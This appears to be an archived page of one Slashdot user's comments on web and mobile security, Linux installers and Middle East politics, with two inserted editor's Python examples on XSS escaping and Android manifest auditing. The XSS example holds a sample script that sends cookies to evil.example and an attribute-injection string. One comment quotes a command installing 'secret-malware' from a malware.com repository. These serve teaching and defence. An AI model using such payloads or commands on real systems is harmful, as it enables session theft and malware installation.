Slashdot Mirror


User: chrb

chrb's activity in the archive.

Stories: 0
Comments: 2,060

Comments · 2,060

  1. Re:Web Applications aren't different on Ask Slashdot: Writing Hardened Web Applications? · · Score: 1

    The problem is not limited to the server trusting the client. The problem is that the client side user *has* to trust the client. Web applications are obviously a subset of all possible client/server types. They are slightly different in that they enforce the use of certain protocols - HTTP, HTTPS, HTML. Your client is a standard web browser. Some people would argue it is harder to secure such a setup than one that uses a custom client, because you no longer have the default choice of a server-side stateful protocol, and because you have to serve HTML (as opposed to, say, restricting the client API to some kind of big-endian bytecoded packet based protocol). Problems like XSS only exist because your client is a standard HTML web browser. Apart from that, you are also exposed to all of the potential bugs in the various platform web browsers, because your "client" is also used to browse random porn sites etc. A custom client, used only for the purpose of connecting to your custom server, does not have this issue of having to deal with data from any old random site on the internet.
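
Added illustration (editor's example, not part of chrb's comment and not code from any project): the point above is that XSS exists only because the client is an HTML parser. The Python below uses the standard library's html.parser as a stand-in for the browser, so you can see which elements and event-handler attributes a given piece of server output would actually create. The payload strings and page templates are constructed for this example; html.escape does the encoding. It goes one step beyond the comment by also showing the attribute context, where escaping alone is not enough if the attribute is left unquoted.

```python
"""Why XSS is a property of the client: the browser parses whatever the server
sends as markup. Editor's added example; inputs are constructed."""
import html
from html.parser import HTMLParser

# Constructed sample inputs: what an attacker submits in a "name" field.
SCRIPT_PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = "x onfocus=alert(1) autofocus"


class BrowserView(HTMLParser):
    """Stand-in for the browser's parser: records the elements and attributes
    the markup actually creates, which is all the browser cares about."""

    def __init__(self) -> None:
        super().__init__()
        self.elements: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, dict(attrs)))


def parse_like_a_browser(markup: str) -> list[tuple[str, dict]]:
    view = BrowserView()
    view.feed(markup)
    view.close()
    return view.elements


# --- text context ---------------------------------------------------------

def greet_vulnerable(name: str) -> str:
    # The server treats `name` as opaque text; the browser treats it as markup.
    return f"<p>Hello, {name}!</p>"


def greet_escaped(name: str) -> str:
    # Encoded for the HTML text context: '<' becomes '&lt;', so no element is created.
    return f"<p>Hello, {html.escape(name)}!</p>"


# --- attribute context ----------------------------------------------------

def field_unquoted(value: str) -> str:
    # Escaping is applied, but the attribute is unquoted: a space ends the value,
    # so the rest of the string becomes new attributes.
    return f"<input value={html.escape(value, quote=True)}>"


def field_quoted(value: str) -> str:
    # Quoted attribute plus quote=True escaping: the whole string stays one value.
    return f'<input value="{html.escape(value, quote=True)}">'


def created_tags(markup: str) -> list[str]:
    """Element names the browser stand-in would instantiate, in document order."""
    return [tag for tag, _ in parse_like_a_browser(markup)]


def handler_attributes(markup: str) -> list[str]:
    """Attribute names starting with 'on' are script handlers a browser would run."""
    return [
        attr
        for _, attrs in parse_like_a_browser(markup)
        for attr in attrs
        if attr.startswith("on")
    ]


if __name__ == "__main__":
    for label, page in [
        ("vulnerable text", greet_vulnerable(SCRIPT_PAYLOAD)),
        ("escaped text", greet_escaped(SCRIPT_PAYLOAD)),
        ("unquoted attr", field_unquoted(ATTR_PAYLOAD)),
        ("quoted attr", field_quoted(ATTR_PAYLOAD)),
    ]:
        print(f"{label:16} tags={created_tags(page)} handlers={handler_attributes(page)}")
```

Run it directly to print what the browser stand-in sees for each of the four renderings: the unescaped text rendering yields a script element, and the unquoted attribute rendering yields an onfocus handler even though the value went through html.escape. The lesson is that the encoding has to match the context the browser will parse the data in, not just "escape everything once".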

  2. Re:Web Applications aren't different on Ask Slashdot: Writing Hardened Web Applications? · · Score: 1

    You probably shouldn't trust your Intranet - there are simply too many ways for a hostile attacker to connect to your network (e.g. open or hackable wifi, ethernet etc.), and you probably have no worthwhile authentication (MAC addresses can be spoofed, most DHCP servers will hand out an IP to anyone,...). Trusting your intranet also means that, if a single machine on your Intranet is compromised, then your trust circle is broken. Note that recognised security expert Bruce Schneier uses an open network. As he said, "If I configure my computer to be secure regardless of the network it's on, then it simply doesn't matter. And if my computer isn't secure on a public network, securing my own network isn't going to reduce my risk very much."

  3. Re:So.... on Windows Phone Homebrew Hits a Snag · · Score: 1

    There is a difference between an unlocked bootloader and an exploit. By your definition, every PC has an "exploit" because it is possible to boot an alternative OS.

  4. Re:Am I missing something? on Insiders Call HP's WebOS Software Fatally Flawed · · Score: 2

    Not "always". There is nothing inherently faster about a GUI layout specified using a native XML based format as used in Android etc. versus one specified with HTML, or even one specified imperatively. Both are just markup languages, or ways of specifying a GUI layout; what actually matters is the implementation that converts this description into an in-memory set of data structures, and which then turns these data structures into graphics commands. There is nothing magical about OpenGL that limits its use to non-HTML user interfaces. You can render any graphics, including those specified in HTML, using an OpenGL backend, but most Android and iOS apps do not directly use OpenGL - there are apps that just create a GL window and then render straight into it (eg that would be a common technique for games), but most apps utilise the widget set provided by the native API, which may be in turn rendered to OpenGL.

  5. Re:Am I missing something? on Insiders Call HP's WebOS Software Fatally Flawed · · Score: 1

    Can we please use the correct terminology? Webkit is not an operating system. An application launcher is not an operating system. A graphical desktop is not an operating system.

  6. Re:Am I missing something? on Insiders Call HP's WebOS Software Fatally Flawed · · Score: 3, Interesting

    iPhone web apps do use webkit to render the UI though. Are web apps too slow to be usable as a result of this? Did users complain that WebOS was too slow? And if so, was it really slow because of webkit? This article clearly blames the hardware rather than the software, stating that WebOS itself ran twice as fast on iPad level hardware. And if WebOS was too slow to be usable, then how come everyone raved about it once they dropped the price? Very few people are so enthusiastic about platforms that are so "fatally flawed". Was it all just marketing hubris?

  7. Re:Antivirus as a sign of failure on Fake Antivirus Scams Spread To Android · · Score: 1

    They did. Android implements security policies for each app. Requested permissions are defined in a manifest file. Every app runs with a different uid. See Android Security and Permissions:

    Android is a privilege-separated operating system, in which each application runs with a distinct system identity (Linux user ID and group ID). Parts of the system are also separated into distinct identities. Linux thereby isolates applications from each other and from the system.

    Additional finer-grained security features are provided through a "permission" mechanism that enforces restrictions on the specific operations that a particular process can perform, and per-URI permissions for granting ad-hoc access to specific pieces of data.

    Security Architecture

    A central design point of the Android security architecture is that no application, by default, has permission to perform any operations that would adversely impact other applications, the operating system, or the user. This includes reading or writing the user's private data (such as contacts or e-mails), reading or writing another application's files, performing network access, keeping the device awake, etc.

    Because Android sandboxes applications from each other, applications must explicitly share resources and data. They do this by declaring the permissions they need for additional capabilities not provided by the basic sandbox. Applications statically declare the permissions they require, and the Android system prompts the user for consent at the time the application is installed. Android has no mechanism for granting permissions dynamically (at run-time) because it complicates the user experience to the detriment of security.

    ...

    At install time, Android gives each package a distinct Linux user ID. The identity remains constant for the duration of the package's life on that device. On a different device, the same package may have a different UID; what matters is that each package has a distinct UID on a given device.
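
Added example (editor's, not from chrb's comment nor from the Android documentation it quotes): the quoted text says permissions are declared statically in the manifest and that every package gets its own Linux UID. The Python below parses a constructed AndroidManifest.xml (a made-up "fake antivirus" app, not a real one) and reports three things a reviewer would check: which requested permissions fall in the dangerous group (the DANGEROUS set is an illustrative subset, an assumption), which components are exported without an android:permission guard, and whether android:sharedUserId is set, which makes packages share one UID and so opts out of the per-app isolation described above. The exported-by-default rule implemented is the pre-API-31 one (an explicit android:exported wins, otherwise a component with an intent-filter is exported); the older provider default is deliberately not modelled.

```python
"""Audit the static permission declarations in an Android manifest.
Editor's added example; the manifest below is constructed, not a real app."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android(attr: str) -> str:
    """ElementTree key for an android:attr attribute."""
    return f"{{{ANDROID_NS}}}{attr}"


# Constructed sample manifest (fictional package, not from any real app).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeav"
    android:sharedUserId="com.example.shared">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <permission android:name="com.example.fakeav.CONTROL"
        android:protectionLevel="signature"/>
    <application android:label="Totally Real Antivirus">
        <activity android:name=".MainActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <service android:name=".ScanService" android:exported="true"/>
        <service android:name=".ControlService" android:exported="true"
            android:permission="com.example.fakeav.CONTROL"/>
        <receiver android:name=".SmsReceiver">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <provider android:name=".LogProvider"
            android:authorities="com.example.fakeav.logs"/>
    </application>
</manifest>
"""

# Assumption: an illustrative subset of the "dangerous" protection level, the
# permissions that touch user data and cost money and so deserve a second look.
DANGEROUS = {
    "android.permission.READ_CONTACTS",
    "android.permission.SEND_SMS",
    "android.permission.READ_SMS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.RECORD_AUDIO",
}

COMPONENTS = ("activity", "service", "receiver", "provider")


def requested_permissions(manifest_xml: str) -> list[str]:
    """Every <uses-permission> the package statically declares, in order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(android("name")) for el in root.iter("uses-permission")]


def dangerous_permissions(manifest_xml: str) -> list[str]:
    return [p for p in requested_permissions(manifest_xml) if p in DANGEROUS]


def is_exported(el: ET.Element) -> bool:
    """Pre-API-31 rule: explicit android:exported wins; otherwise a component
    with an intent-filter is exported and one without is not. (Providers on
    very old targets defaulted to exported; that case is not modelled.)"""
    explicit = el.get(android("exported"))
    if explicit is not None:
        return explicit.lower() == "true"
    return el.find("intent-filter") is not None


def unprotected_exported_components(manifest_xml: str) -> list[str]:
    """Components any other app on the device can invoke: exported and not
    guarded by an android:permission. The launcher activity is expected here."""
    app = ET.fromstring(manifest_xml).find("application")
    return [
        f"{el.tag}:{el.get(android('name'))}"
        for el in app
        if el.tag in COMPONENTS and is_exported(el) and el.get(android("permission")) is None
    ]


def shared_user_id(manifest_xml: str):
    """android:sharedUserId makes packages signed with the same key share one
    Linux UID, which undoes the per-package UID isolation. None if unset."""
    return ET.fromstring(manifest_xml).get(android("sharedUserId"))


if __name__ == "__main__":
    print("requested:", requested_permissions(SAMPLE_MANIFEST))
    print("dangerous:", dangerous_permissions(SAMPLE_MANIFEST))
    print("exported without permission:", unprotected_exported_components(SAMPLE_MANIFEST))
    print("sharedUserId:", shared_user_id(SAMPLE_MANIFEST))
```

On the sample, ScanService and SmsReceiver are reachable by any other app, while ControlService is not because it is guarded by a signature-level permission; the sharedUserId line is the one that should prompt the question of which other package this app expects to share a UID with.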

  8. Re:Antivirus as a sign of failure on Fake Antivirus Scams Spread To Android · · Score: 1

    Security policies can be configured by file paths and processes as well as user id. See Security-Enhanced Linux, AppArmor, etc.

  9. Re:Bad Statistics on Fake Antivirus Scams Spread To Android · · Score: 1

    the supposed major benefit of Android over iOS, that you can go outside the main app store, is something that no one actually uses?

    Power users (read "geeks") use it. Most of them will be using an internal corporate repository, development repo, or some other trusted source like the Amazon app store. As far as I can see, the majority of "normal" users have no desire for any of those things, they mostly just want to run Facebook, eBay, and Angry Birds, so all they need is the official app store. There may be some significant exceptions though: apps which aren't allowed on the official app store (like N64 emulators), and pirated apps; both of these might be quite popular (reliable figures are difficult to get), and are only available from external sources.

    Or is this just true when its negative features are brought into the spotlight?

    The negative feature of being free to choose to install whatever software I choose on a device that I own? Yes, with freedom comes risk, but I would rather be free to make a mistake than not.

    I prefer "He who sacrifices freedom for security deserves neither" to "you shouldn't be allowed to have a choice because you might make the wrong decision"

  10. Re:Walled gardens.. on Fake Antivirus Scams Spread To Android · · Score: 5, Informative

    the iOS App Store and KNOW all that stuff has already been done for me

    Malicious app penetrates iTunes store to test security

    Miller's malware was on the Apple app store for over 2 months, so clearly the Apple store is vulnerable to the same sort of shenanigans as the Android market.

    Apple has never had to exercise its "Kill Switch" option for an App already in the Wild

    From the BBC article: "Apple declined to comment. It also removed the app and barred the developer from its store."

  11. Re:Antivirus as a sign of failure on Fake Antivirus Scams Spread To Android · · Score: 1

    As far as I know, the vast majority of these "malware apps" are found on random external sites, most of which are supposedly based in China (or at least targeting Chinese users). Certainly, if McAfee is reporting that they have found tens of thousands of these malware apps, then these aren't apps which were available on the official Android Market. The malware that has been found on the official Android Market is in the scale of tens of apps, not thousands.

  12. Re:sudo, gksudo, what is difference? on Fake Antivirus Scams Spread To Android · · Score: 1

    The difference is that you don't type anything on the command line. The post I was responding to was basically claiming that Linux is more vulnerable because you need to type "sudo apt-get blah" to install a package, so then dumb users can be tricked into typing something like "sudo apt-add-repository http://malware.com/ && sudo apt-get install secret-malware". As (supposedly) opposed to OS X and Windows, where the GUI limits the actions of dumb users to only choosing preapproved software from a predefined repository. At least, that is how I interpreted it. The point I was making is that exactly the same package manager GUIs also exist under Linux, and have done for a very long time. Hence dumb users don't have to (and probably won't) use "sudo apt-get ...", they will use the GUI instead, so whatever vulnerabilities exist in this context are exactly the same as on the other operating systems. In fact, I'd go further and say it's worse on the other platforms, as the barrier for installing external software is lower - a "dumb" Linux user has to add an external repository and navigate a package manager, whereas a "dumb" Windows user just has to visit any random web site which will prompt them to download and run an executable file. (Obviously, I am speaking in generalisations, I understand there are PPAs, and that not all Windows users install software from random web sites etc.)

  13. Re:Antivirus as a sign of failure on Fake Antivirus Scams Spread To Android · · Score: 1

    You don't need sudo to install apps on Android.

  14. Bad Statistics on Fake Antivirus Scams Spread To Android · · Score: 2

    "Number of new fake malware" is not the same as "number of malware infections". With the right tool you can generate an infinite number of malware variants. The statistic from McAfee includes every single individual file that contains some malware - this is like saying that, for an old school virus that infects .exe files on Windows, every single infection counts as a different "unique malware instance". And if one of these is uploaded to an app store - even an app store that nobody uses, even for a "unique malware instance" that nobody ever installs - then it gets counted by McAfee. The equivalent in the iPhone world would be counting all malware in every random Cydia repository on the web. Obviously there is a big difference between a random repository on the web, and something being distributed by the official repository.

    What would actually be useful is to know the number of malware instances that have made it on to app stores that people actually use (eg the official one), how many people installed them, and how long it was before the app was removed. But obviously this number would be much lower, and so generate far fewer page hits.

  15. Re:Antivirus as a sign of failure on Fake Antivirus Scams Spread To Android · · Score: 3, Informative

    When you need 'sudo' to install a new app.

    You don't. There have been GUI application installers on Linux for over a decade.

  16. Re:Is Google trying to fragment web? on MAME Running In Chrome · · Score: 2

    Microsoft never released the source code for free, though. The probability of uptake is higher if other browsers are given a free implementation.

  17. Re:I'm surprised you didn't include Occupy on How the Year Looked On Slashdot · · Score: 1

    Actually, I'm surprised the Arab Spring wasn't included. There is certainly a technological angle. We have seen everything from Gadaffi blaming Wikileaks for sparking the revolutions, to a baby girl in Egypt being named "Facebook". Perhaps it was the Year of the Protester after all.

  18. Re:no so many killers. on How the Year Looked On Slashdot · · Score: 3, Interesting

    I nominate 2011 as the year of the patent lawsuit. Apple managed to get Samsung's products banned. In return, Samsung eventually got a revenge ruling banning Apple's products. Everybody in the phone industry went lawsuit crazy suing each other, and Microsoft earned more money from patent extortion against a competing product than they did by legitimately selling their own product.

  19. Re:Gee, maybe U.S. shouldn't try to steal oil on Tensions Over Hormuz Raise Ugly Possibilities For War · · Score: 1

    Not all, just some. Caspian Sea oil dates back centuries but recent interest emerged in the 90s: http://en.wikipedia.org/wiki/Caspian_Sea#Hydrocarbon_resources

    oil in the Caspian basin is estimated to be worth over US $12 trillion. The sudden collapse of the USSR and subsequent opening of the region has led to an intense investment and development scramble by international oil companies. In 1998 Dick Cheney commented that "I can't think of a time when we've had a region emerge as suddenly to become as strategically significant as the Caspian."

    I'm not saying that the stability of Eastern Europe is not strategically important, just suggesting that $12 trillion of oil reserves is also pretty important, and a pretty big motivator for a government concerned with that kind of thing.

  20. Re:Gee, maybe U.S. shouldn't try to steal oil on Tensions Over Hormuz Raise Ugly Possibilities For War · · Score: 1

    I don't know who originally reported it (it was over a decade ago), but if you check Google books or scholar you'll find references. books link scholar link

  21. Re:Suicide boats is not Iran's primary weapon on Tensions Over Hormuz Raise Ugly Possibilities For War · · Score: 1

    Taliban was never a "big" enemy.

    Sure, it depends on how you define "big" - they may have never actually gone to war, but certain events suggest that there was a lot of bad blood and covert ops between them, and war was never far off:

    1) The Taliban's harsh treatment of Afghanistan's Shi'a minority outraged Iran

    2) Iran materially and financially supported the Northern Alliance fighting against the Taliban in the Afghan civil war. It is alleged that, as well as supplying them with millions of dollars of weapons and ammunition, plus training, Iran also allowed friendly militias to cross the border and shelter in Iran.

    3) The Taliban seized the Iranian consulate and executed Iranian diplomats and intelligence officers. This brought Iran and the Taliban very close to all out war (it was reported that something like a quarter million Iranian troops were massed on the border ready for war, though later reports revise that figure down). 1998_Iranian_diplomats_assassination_in_Afghanistan

    4) The ongoing drugs war between Taliban smugglers and Iranian security forces, a war in which thousands of Iranians have been killed (this article claims 3 Iranians are killed every day). The Iranian government is firmly opposed to drugs, and the Taliban gets the majority of its funding from drugs, of which the transit route to Europe through Iran is of particular importance. There has been little space for compromise here.

  22. Re:no win war on Tensions Over Hormuz Raise Ugly Possibilities For War · · Score: 1

    Really? You would attack me for something my government (who I didn't even vote for) did?

    Not saying that I agree with this, but that is the logic used by Osama bin Laden to justify attacking US citizens - if you have democracy, then all citizens are responsible for the actions of the government. Similarly, there appear to be many Americans who would be happy to nuke various cities in the Middle East, killing millions of innocent civilians, because of the behaviour of governments which the citizens of these non-democratic states didn't even get the chance to vote for. People are instinctively tribal, and nationalism is an easy mental justification for war, particularly when it is believed that there won't be any personal repercussions. (If we actually let the troops vote on whether they go to war, or if the middle classes were conscripted, then the picture might be quite different).

  23. Re:Suicide boats is not Iran's primary weapon on Tensions Over Hormuz Raise Ugly Possibilities For War · · Score: 5, Insightful

    Given the size of Iran versus its powerful adversary, Iran seems to be doing okay geopolitically. In the last decade, two of their biggest regional enemies have been eliminated (Saddam and the Taleban) and replaced with friendly regimes. The myth of Israeli invincibility was destroyed in the Lebanon war, making Israel more reluctant to use their military in the future.

    Sure, in an all-out war between the US and Iran, then Iran would be destroyed. But in order to avoid this, the Iranian government only need convince the US that it would in turn suffer unacceptable military and economic losses. It's a game of brinksmanship - the aim (for both sides) is to get as much as you can get without actually going to war.

    2. Stop supporting international terrorism. If you want to brutalize your own people that will probably be tolerated indefinitely. But if you spread chaos throughout the region then it forces the US to respond. Don't do that.

    Both US and Iran are guilty of playing games of geopolitics and interference in the affairs of other nations. It's a bit rich to accuse Iran of being the one to destabilise the region after the US has invaded and overthrown two major regional governments, leading to a decade long civil war in both countries...

    It just forces the US to send resources to the area and focuses additional resources on their country. None of that is good for Iran.

    Forcing your enemy to squander resources is a kind of win. Posturing is also a kind of win, like the teenager showing off his muscles and martial skills in the school yard, it sends a particular message to be wary of messing with this kid.

  24. Re:Gee, maybe U.S. shouldn't try to steal oil on Tensions Over Hormuz Raise Ugly Possibilities For War · · Score: 4, Insightful

    Large Potential Albanian Oil and Gas Discovery Underscores Kosovo's Importance

    On January 10, Swiss-based Manas Petroleum Corporation broke the news. Gustavson Associates LLC's Resource Evaluation identified large prospects of oil and gas reserves in Albania, close to Kosovo. They are in areas called blocks A, B, C, D and E, encompassing about 780,000 acres along the northwest to southeast "trending (geological) fold belt of northwestern Albania."

    A Discreet Deal in the Pipeline

    In November 1998, Bill Richardson, then US energy secretary, spelt out his policy on the extraction and transport of Caspian oil. "This is about America's energy security," he explained. "It's also about preventing strategic inroads by those who don't share our values. We're trying to move these newly independent countries toward the west. "We would like to see them reliant on western commercial and political interests rather than going another way. We've made a substantial political investment in the Caspian, and it's very important to us that both the pipeline map and the politics come out right."

  25. Re:Gee, maybe U.S. shouldn't try to steal oil on Tensions Over Hormuz Raise Ugly Possibilities For War · · Score: 5, Interesting

    "Stolen" is a confrontational term, but put it this way: if China backed an armed revolution inside the US which successfully overthrew the government and installed a military dictatorship, and then contracts were signed that gave Chinese corporations access and control over the natural resources of the US, would you consider this to be okay? Or would you consider that, somehow, the natural resources were being "stolen"?

    There are many references claiming that this has happened, see war is a racket, the war on democracy etc. There was even an honest politician from one country who was vilified because he stated straight up that they were part of the Iraq coalition in exchange for corporate access to oil.